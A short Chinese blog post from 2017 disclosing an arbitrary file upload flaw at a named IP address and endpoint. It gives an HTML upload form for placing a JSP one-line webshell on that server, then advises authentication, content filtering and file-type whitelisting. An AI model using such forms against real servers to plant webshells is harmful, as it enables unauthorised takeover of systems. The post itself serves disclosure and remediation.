构造表单任意文件上传

 

漏洞地址:http://168.2.5.100/UpFileImage

漏洞利用

构造表单直接上传jsp一句话木马

<form enctype="multipart/form-data" action="http://168.2.5.100/UpFileImage" method="post">  

Upload a new file:<br>  

<input type="file" name="file" size="50"><br>  

<input type="submit" value="Upload">  

</form>

修复方案:添加上传页面的认证,对上传内容进行过滤,白名单限制上传文件类型。  

posted @ 2017-05-12 13:01  Bypass  阅读(1929)  评论(0编辑  收藏  举报